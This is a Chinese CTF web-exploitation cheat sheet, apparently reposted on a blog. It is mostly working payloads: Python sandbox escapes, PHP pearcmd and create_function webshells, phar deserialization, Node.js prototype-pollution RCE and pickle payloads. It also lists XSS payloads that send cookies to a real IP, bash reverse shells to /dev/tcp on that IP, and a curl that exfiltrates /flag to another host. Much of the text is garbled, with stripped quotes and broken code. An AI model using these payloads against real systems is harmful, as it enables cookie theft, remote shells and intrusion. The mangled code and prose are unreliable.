getattr(getattr(getattr(getattr(().class,chr(95)*chr(95)*chr(98)*chr(97)*chr(115)*chr(101)*chr(95)*chr(95)),chr(95)*chr(95)*chr(115)*chr(117)*chr(98)*chr(99)*chr(108)*chr(97)*chr(115)*chr(115)*chr(101)*chr(115)*chr(95)*chr(95))()[*-4],chr(95)*chr(95)*chr(105)*chr(110)*chr(105)*chr(116)*chr(95)*chr(95)),chr(95)*chr(95)*chr(10)*chr(108)*chr(111)*chr(98)*chr(97)*chr(108)*chr(115)*chr(95)*chr(95))chr(115)*chr(121)*chr(115)*chr(116)*chr(101)****chr(109)

_利用

字符长度限制

s<1

eval(input())

然后在执行上面的

S<7

一开始输入help()，进入到help界面，然后随便个模块，例如os输入，此时就会显示os模块的帮助页面，输入!sh就能进到shell里面去。

无help（）

breakpoint()

再正常输入

globals()函数

泄露全局变量

Server模块有类似作用

Dir()函数

查看根目录

Dir(my_flag)查看底下类

My_flag.()方法使用

Byte代替char

Payload = open(flag).read()

open((bytes([102])bytes([108])bytes([97])bytes([10])).decode()).read()

bytes用基类代替

().class.base.subclasses()[6] --->通过基类使用bytes

().doc[1:200]使用

python中存在unicode的注入，所以直接调用level2的payload改下unicode

��val(inp��t())

****绕过方式

().class.base.subclasses()[-4].init.globals[str().join([().doc[19],().doc[86],().doc[19],().doc[4],().doc[17],().doc[10]])](str().join([().doc[19],().doc[56]]))

_posixsubprocess绕过

****多次输入

builtins[ loader ].load_module( _posixsubprocess )

或：

loader.load_module( _posixsubprocess )

import os

loader.load_module( _posixsubprocess ).fork_exec([b/bin/sh], [b/bin/sh], True, (), one, one, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, one, one, one, -1, one)

交替python和shell运行

****单次输入

[os := import( os ), itertools := loader.load_module( itertools ), posixsubprocess := loader.load_module( posixsubprocess ), [_posixsubprocess.fork_exec([b/bin/sh], [b/bin/sh], True, (), one, one, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, one, one, one, -1, one) for i in (0)]]

随机数

****输出流重定向

import(sys).stdout.write(import(os).read(import(os).open(flag,import(os).O_RDOLY)0x114).decode())

int(str(import( sys )._getframe(1).f_locals[right_guesser_question_answer]))

****回溯随机数

random:=import( random ), state:=random.getstate(), pre_state:=list(state[1])[:624], random.setstate((,tuple(pre_state[0]),one)), random.randint(1, 9999999999999)

函数利用

(lambda:os.system( cat flag ))()

class WOOD(type):

getitem=os.system

class WHALE(metaclass=WOOD):

pass

tmp = WHALE[ sh ]

偏门赛题

php运用原生类eval(“ ”,$ )

action=%5ccreate_function&arg=}system( cat /sec* );//

Zip读取

https://game.sycsec/include.php?file=zip://upload/1cmd.jpg.zip%2cmd.jpg

局部变量替换绕过

preg_replace( |$option= .* ;| , $option= $str ;, $file);

ctf大赛原题

CTFSHOW大赛原题篇(web680-web695)_ctfshow web680

条件竞争

<?php ?> ;

file_put_contents( 1.php ,$a); ?>

XSS专题

****过滤img

****过滤script

过滤空格

body/οnlοad=document.location= http://47.99.125.16/receive.php?cookie= ;

归纳

<script>(	http://47.99.125.16/receive.php?cookie=	)</script>

<script>var img = (img);img.src = http://47.99.125.16/receive.php?cookie=?cookie=;</script>

<script>window.location.href=	http://47.99.125.16/receive.php?cookie=	</script>

<script>location.href=	http://47.99.125.16/receive.php?cookie=	</script>

<input οnfοcus=(	http://47.99.125.16/receive.php?cookie=	) autofocus>

<svg οnlοad=(	http://47.99.125.16/receive.php?cookie=	)>

<iframe οnlοad=(	http://47.99.125.16/receive.php?cookie=	)></iframe>

<body οnlοad=(	http://47.99.125.16/receive.php?cookie=	)>
读全网页
var img = new Image();
img.src = http://47.99.125.16/receive.php?cookie=document.querySelector(	#top > div.layui-container	).textContent;
document.body.append(img);

ode.js题目

1.包含eval内利用

require(	child_process	).execSync(	ls /	).toString()

require( 	child_process	 ).spawnSync( 	ls	, [ 	/	 ] ).()

global._load(	child_process	).execSync(	ls	,
[	.	]).toString()

js中的拼接问题：

cole.log(5[6,6]); //56,6
cole.log(56); //56
cole.log(5[6,6]); //56,6
cole.log(5[6,6]); //56,6

所以：像[ a ]flag=== a flag这样的，比如flag是flag{45}，那么最后得到的都是aflag[45}，因此这个也肯定成立：md5([ a ]flag)===md5( a flag)，同时也满足a!==b：

因此还可以构造：

?a[a]=1&b[b]=1

.长度字符限制数组异常绕过

{checkcode:[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}

原型链污染

启蒙文章

点击展开代码块

// foo是一个简单的JavaScript对象
let foo = {bar: 1}

// foo.bar 此时为1
cole.log(foo.bar)

// 修改foo的原型（即Object）
foo.__proto__.bar = 2

// 由于查顺序的原因，foo.bar仍然是1
cole.log(foo.bar)

// 此时再用Object创建一个空的zoo对象
let zoo = {}

// 查看zoo.bar
cole.log(zoo.bar)

</details> 最后，虽然zoo是一个空对象{}，但zoo.bar的结果居然是2，原因也显而易见：因为前面我们修改了foo的原型foo.proto.bar = 2，而foo是一个Object类的实例，所以实际上是修改了Object这个类，给这个类增加了一个属性bar，值为2。

后来，我们又用Object类创建了一个zoo对象let zoo = {}，zoo对象自然也有一个bar属性了。

那么，在一个应用中，如果攻击者控制并修改了一个对象的原型，那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染。要用json格式

普通变量相等绕过

{__proto__:{ctfshow:6dboy}}

升级rce绕过

{__proto__:{query:return global._load( child_process ).exec( bash -c \bash -i >& /dev/tcp/47.99.125.16/89 0>&1\ )}}

函数套函数

{__proto__:{__proto__:{query:return global._load( child_process ).exec( bash -c \bash -i >& /dev/tcp/47.99.125.16/89 0>&1\ )}}}

ejs模板rce

{__proto__:{__proto__:{outputFunctioname:_tmp1;global.require( child_process ).exec( bash -c \bash -i >& /dev/tcp/47.99.125.16/89 0>&1\ );var __tmp2}}}

滤了proto，我们可以用ctructor.prototype代替

{ctructor.:
a=1;return global._load(	child_process	).execSync(	cat /	);//}

{ctructor.: _tmp1;global.require(	child_process	).exec(	bash -c \\bash -i >& /dev/tcp/xxx/4444 0>&1\\	);var __tmp2}

例题

ctfshow

pear包含

安装了pear

开启了registerargcar

存在可控的include $GET[ f ](即使是include $GET[ f ].php)

?file=/usr/local/lib/php/pearcmd.php&config-create/<?=eval($_POST[1]);?>/var/www/html/a.php

1=system(‘ls’);用burp放如果用hackbar放会把<>url编码

不要照搬，前面是include（pearcmd.php）这个函数，后面是放入参数。

?file=/usr/local/lib/php/pearcmd.php&lalalainstall±R/var/www/html/http://vps-ip/shell.php

打php-rfm

python2 gopherus.py --exploit fastcgi

函数使用

非法传参名

当PHP版本小于8时，如果参数中出现中括号[，中括号会被转换成下划线，但是会出现转换错误导致接下来如果该参数名中还有非法字符并不会继续转换成下划线，也就是说如果中括号[出现在前面，那么中括号[还是会被转换成下划线，但是因为出错导致接下来的非法字符并不会被转换成下划线

$_GET[ show_show.show ]

show[show.show

例题1：

传参1%2B1>2

python用法

1.正则提取计算

import math

import requests
import re
url = 	http://82.157.146.4:14709/	
payload = {
    input: 12,
    ans: 12
}
math=		
res = requests.post(url, payload)
num_pattern = repile(r	<div style=display:inline;>(.*?)</div>	)
num = num_pattern.findall()  # 正则提取公式
payload=9227206854775807		math.join(num)[0:-1]
print(payload)

pickle反序列化题目

常用payload

return (commands.getoutput,( ls / ,))

import pickle
import urllib
import commands

class payload(object):
    def __reduce__(self):
        return (commands.getoutput,(	ls /	,))

a = payload()
print urllib.quote(pickle.dumps(a))

import pickle
import base64


class GetShellWithPython(object):
    def __reduce__(self):
        import subprocess
        return (,
                ([	python	,
                  	-c	,
                  	import os;	
                  	os.system(curl http://49.22.224.59:89?a=`cat /flag`);	],))


pickleData = pickle.dumps(GetShellWithPython())
pickle.loads(pickleData)
print(base64.b64encode(pickleData))

Php题目

心得：

1.preg_math过滤什么留下的就是使用的漏洞

过滤括号（，就用不用括号的，常见的有include、require、echo等，

include函数
    常用伪协议php:filter-->文件名已知
    data://text/plain,<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       ?>这段代码，对前面的内容或者后缀名是没有要求的，可以直接修改为其他后缀。

只要将phar文件使用 gzip 命令进行压缩,这段代码就会消失。

phar由data,data签名（20位）,和签名格式（8位）组成。

生成phar文件,同时放入010增加属性数量来绕过weak_up

<?php

class Lovess
{
    public $ljt;
    public $dky;
    public $cmd;

    public function __ctruct()
    {
        $this->ljt = Misc;
        $this->dky = Re;
        $this->cmd = 	system($_POST[0]);	;
    }

}

$o = new Lovess();
$phar = new Phar(phar.phar); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub(<?php __HALT_COMPILER(); ?>); //设置stub
$o = new Lovess();
$phar->setMetadata($o); //将自定义的meta-data存入manifest，setMetadata()会将对象进行序列化
$phar->addFromString(, test); //添加要压缩的文件
$phar->stopBuffering(); //签名自动计算
#本题要将生成得phar文件放入010修改属性数量来绕过weak_up
#php.ini中phar.readonly改成Off

修改签名

from hashlib import sha1
import gzip

with open(	D:\\sublime text\\Sublime Text\\source\\反序列化\\phar.png	, 	rb	) as file:
    f = file.read()
s = f[:-28]  # 获取要签名的数据
h = f[-8:]  # 获取签名类型以及GBMB标识
new_file = s  sha1(s).digest()  h  # 数据  签名  (类型  GBMB)
f_gzip = gzip.GzipFile(D:\\sublime text\\Sublime Text\\source\\反序列化\\2.png, wb)
f_gzip.write(new_file)
f_()

Pear包含

****方法一：远程文件下载（下载远程木马到本地）

?file=/usr/local/lib/php/pearcmd.php&lalalainstall±R/var/www/html/http://vps-ip/shell.php

lalala：随便输，第一个参数没用，第二个有用

install：安装远程扩展

-R：指定安装到的目录

/var/www/html/：目录

http://vps-ip/：从哪下载

****方法二：生成配置文件，配置项传入我们恶意的php代码的形式

****1=/usr/local/lib/php/pearcmd.php&±c/tmp/ctf.php±dman_dir=<?php%20eval($_POST[1]);?>±s

****方法三：写配置文件方式

GET /?file=/usr/local/lib/php/pearcmd.php&aaaaconfig-create/var/www/html/<?=`$_POST[1]`;?>shell.php

（最后有一个空格）

POST/?config-create/&file=/usr/local/lib/php/pearcmd.php&/<?=system( cat${IFS}/f* );?>/var/www/html/test

1=localhost/usr/local/lib/php/pearcmd.php&/?=@eval($_POST[ cmd ]);?/var/www/html/test.php

相同字符强弱相等绕过，采用单个字符url二次编码绕过

函数总结

assert()

basename()

例题一：

会误以为config.php是当前目录

加了过滤

不可见字符绕过正则的同时而且会被basename忽略掉

例如：汉字、？、《、》、；

(basename漏洞)[[Zer0pts2020]Can you guess it?（basename漏洞）_basename绕过-CSD博客]

parse_url

parse_url这个函数，这个函数主要就是将一个url链接进行分解，例如页面不存在_百度搜索

例题一：

例题二：

host遇到:和/会截断

其中host是baidu path是/aaa/bbb 注意这里的path是含有/的，host是不能有/的，所以返回根目录用cd

所以例如传入http://ls/a.php,分解开就是 echo ls> /a.php，会写如到根目录下，不方便访问。

因此要想办法写入到当前目录，这里构造语句将前面提前闭合即可。http://1/1;echo ls > (注意这里用反引号，不用system，因为system是php函数，这里设shell_exec里，用反引号来代表命令替换)assert也可

例题三：多重变量

</detalis>

host=>user,user=>pass,pass=>query以此类推便可以实现变量覆盖了

file_get_content()

-->php伪协议-->data://text/plain,I have a dream-->

file_put_contents()

<?php$dir = /path/to/directory/; // 替换为要保存文件的目录路径$code = echo Hello, World! ;; // 替换为要写入文件的 PHP 代码$fuxkfile = // additional content; // 替换为要写入文件的额外内容

file_put_contents($dir . index.php, <?php .$code.$fuxkfile);***\*?>

例题里面的file为?>闭合

Payload=?><?=nl%09/*

getip()

Client-ip控制

Include()

php伪协议读取-->pear文件包含-->session文件包含

· 伪协议读文件二次URL编码

· 打opcache缓存

· 包含pearcmd装马

· 靶机可以出网

· 靶机不能出网

· 绕过包含次数限制

· include2shell

· compress.zlib生成临时文件

· 包含nginx临时文件

intval

If(intval($a))-->数组a[]绕过

Is_number()

是数字返回1

Math.random()

#!/usr/bin/python import z,struct,sys sequence = [0.6199046082820001, 0.6626781965961, 0.719018168749095, 0.06169296721449724, 0.91579978059427] sequence = sequence[::-1] solver = z.Solver() se_state0, se_state1 = z.BitVecs(se_state0 se_state1, 64) for i in range(len(sequence)): se_s1 = se_state0 se_s0 = se_state1 se_state0 = se_s0 se_s1 ^= se_s1 << 2 se_s1 ^= z.LShR(se_s1, 17) se_s1 ^= se_s0 se_s1 ^= z.LShR(se_s0, 26) se_state1 = se_s1 float_64 = struct.pack(d, sequence[i] 1) u_long_long_64 = struct.unpack(<Q, float_64)[0] mantissa = u_long_long_64 & ((1 << 52) - 1) solver.add(int(mantissa) == z.LShR(se_state0, 12)) if () == z.sat: model = () states = {} for state in model.decls(): states[state.str()] = model[state] state0 = states[se_state0].as_long() u_long_long_64 = (state0 >> 12) | 0xFF0000000000000 float_64 = struct.pack(<Q, u_long_long_64) next_sequence = struct.unpack(d, float_64)[0] next_sequence -= 1 print(next_sequence)

Pathinfo()

你可以通过以下方式访问 `pathinfo()` 返回的关联数组中的不同信息：

- `$info[	dirname	]`：返回文件所在目录的路径。
- `$info[	basename	]`：返回文件的完整基本名称（包含文件名和扩展名）。
- `$info[	extension	]`：返回文件的扩展名。
- `$info[	filename	]`：返回文件的名称（不包含扩展名）。

toLowerCase

这个K的“小写”字符是k，也就是K.toLowerCase() == k .

toUpperCase

这两个字符的“大写”是I和S。也就是说ı.toUpperCase() == I ，ſ.toUpperCase() == S 。通过这个小特性可以绕过一些限制。

Array_search

test[]=0绕过

Call_user_func

ctfshow=ctfshow::getFlag 前面类后面方法

ctfshow[0]=ctfshow&ctfshow[1]=getFlag #POST

phpinfo

putenv

[BASH_FUC_echo%25%25]=()%20{%20cat /f*;%20}

我是如何利用环境变量注入执行任意命令-腾讯云开发者社区-腾讯云

直接连

prase_str()

GET方法传参_POST[key1]=6d

parse_str()将字符串解析到*POST*数组中，数组此时就有了一个键值对

此时，效果上相当于以POST方法传参 key1=6d

Strpos()

//匹配到即可 php://filter/read=convert.base64-encode/woofers/resource=flag这里伪协议的协议中都指定了特定的协议键，识别到woofers时不认识会忽略掉，但这道题却能够绕过strpos函数

escapeshellcmd

反斜线（\）会在以下字符之前插入： &#;`|*?~<>^()[]{}$, \x0A 和 \xFF。 ’ 和 “ 仅在不配对儿的时候被转义。

escapeshellarg() escapeshellcmd()

传入的参数是：172.17.0.2 -v -d a=1经过escapeshellarg处理后变成了 172.17.0.2 -v -d a=1 ，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。经过escapeshellcmd处理后变成 172.17.0.2 \ -v -d a=1 ，这是因为escapeshellcmd对\以及最后那个****不配对儿的引号进行了转义：PHP: escapeshellcmd - Manual最后执行的命令是curl 172.17.0.2 \ -v -d a=1 ，由于中间的\被解释为\而不再是转义字符，所以后面的没有被转义，与再后面的配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1 ，即向172.17.0.2\发起请求，POST 数据为a=1 。

样例： <?= @eval($_POST[pd]);?> -oG pd.phtml

Exit（）

php死亡exit()绕过 - xiaolong s blog

****Data()

注意date函数可以进行转义把/f\l\a\g转化为/flag

****Create_function()

$nss_shell = create_function($shell,$nss);

shell=){}system( cat /f* );//&nss=12

参数可控：****};system($_POST[1]);//

匿名函数在使用后名称是\000lambda_1，每次使用都会加1，这样构造d0g使匿名函数闭合，执行

其他函数，name为\000lambda_payload⻓度，即可进入执行命令

普通上传会吃掉\000

import  requests

req  =  requests.session()

with  open(		,	a	)  as  f:

  for  i  in  range(1,):

    str  =  \000

    payload  =  ?d0g=11111include	]);}phpinfo();/*&name=

    payload  =  payload    str	lambda_0	

    res=req.get(http://47.108.206.4:621payload)

    print(,file=f)

****Yaml.load()

name : { toString: !!js/function function(){ flag = require( child_process ).execSync( cat /fla* ).toString(); return flag;}}

****$_REQUEST

同时接受post和get，但优先接受post可以进行绕过

****$_SERVER[ QUERY_STRIG ]

用url编码绕过

toUpperCase()

字符ı、ſ 经过toUpperCase处理后结果为 I、S

toLowerCase():

字符K经过toLowerCase处理后结果为k(这个K不是K)

****fastcgi_pass

Gopher打fastcgi

反序列化题目：

if (!preg_match(/[a-zA-Z0-9~-_=!\^()]/, $this->gg2)) {

通过正则可以触发tostring

****字符逃逸

字符逃逸的本质其实也是闭合，但是它分为两种情况，一是字符变多，二是字符变少

字符增多

****溢出多少看;i:1;s:2:20;}这个长度

字符减少

要使用两个变量进行控制，第一段进行变少覆盖掉原来的第二段，吃到第二个的hello停止，这样直接开启下一个，而下一个刚好是自己控制的，因为s:54被吃掉所以自由控制后面，

那第一个变量就是我们逃逸出来的

hello;s:4:sign;s:4:eval;s:6:number;s:4:2000;}

里面包括自己构造随机一个变量

****Destruct触发

public function __destruct(){

global $flag;

echo $flag;

}

· 字符过滤绕过：函数名, 方法名, 类名不区分大小写

if(preg_match( /ctfshow/ , $cs)){

区分大小写的：变量名、常量名、数组索引（键名key）不区分大小写的：函数名、方法名、类名、魔术常量、ULL、FALSE、TRUE

****绕过throw new Exception 强制GC回收执行__destruct()函数

#O:4:test:1:{s:5:test1;s:2:aa;}//将此处1改为0即可正常销毁 $str= O:4:test:0:{s:5:test1;s:2:aa;} ;

Fastapi

发现其自带交互式API文档，访问/docs页，有采用POST方式传参的/cccalccc页，参数q传入计算式得到结果。

综合例题

常见问题

1.读取文件读不到？

尝试PHP协议读取

File=php://filter/convert.base64-encode/resource=flag.php

MD5拓展长度攻击(hashpump)

Input Signature #现有哈希值（题目给的MD5）

Input Data #已知字符串

Input Key Length #为密文（salt）长度

Input Data to Add #为补位后自己加的字符串（自定义）

src挖洞之路：

新手入门：

开挖之路心得入门

1.AVWS的安装

检测漏洞

java -javaagent:rexha.jar -jar rexha.jar

查询平台：

ICP备案查询子域名-https://gov/#/Integrated/recordQuery

whois域名反查-域名Whois查询 - 站长工具

子域名查询-https://chaziyu、ip查询查ip 网站ip查询同ip网站查询 iP反查域名 iP查域名同ip域名

站长之家：百度权重查询 - 站长工具

备案查询：https://gov/ 鹰图平台

ip地址查询：IP地址查询 - 在线工具 ip查询查ip 网站ip查询同ip网站查询 iP反查域名 iP查域名同ip域名

sql漏洞：

google语法：

公司inurl:php?id=

公司inurl:asp?id=

公司inurl:aspx?id=

后台：inurl：/admin/login.php

    inurl:	Product.asp?BigClassame

#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可，转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格

本文地址：http://www.dnpztj.cn/biancheng/1108860.html

本站网友手机开发平台	23分钟前发表
sys sequence = [0.6199046082820001
本站网友中佳易购	27分钟前发表
escapeshellcmd - Manual最后执行的命令是curl 172.17.0.2 \ -v -d a=1 ，由于中间的\被解释为\而不再是转义字符，所以后面的没有被转义，与再后面的配对儿成了一个空白连接符
本站网友三级网络技术	30分钟前发表
one) 交替python和shell运行 ****单次输入 [os
本站网友郭敬明的微博	8分钟前发表
txt.galf_eht_si_siht/ tac [
本站网友日字加一笔都有什么字	16分钟前发表
filter-->文件名已知 data
本站网友心草	14分钟前发表
test1;s
本站网友携带头发被截获	1分钟前发表
///sys/class/net/eth0/address flask的ping值计算 1.username 启动flask的用户名 (/etc/passwd 读取）默认值flask.app .appname 默认flask 可通过报错信息得到 flask库下app.py的绝对路径 /etc/pass 5.uuidnode 读取/sys/class/net/eth0/address MAC地址十六进制转化为十进制根据网卡名称自行更改（更正）/proc/sys/kernel/random/boot_id /proc/self/cgroup 看是不是docker /proc/sys/kernel/rand] /etc/machine-id/proc/self/cgroup合起来才是后半段 /proc/sys/kernel/random/boot_id**/proc/self/cgroup import os *os.popen( ls / ).read() Randomrandom=uuidnode ***读取文件用python2 import random random.seed(0x0242ae0295f6) print(str(random.random()2)) local_file
本站网友新产品开发	25分钟前发表
4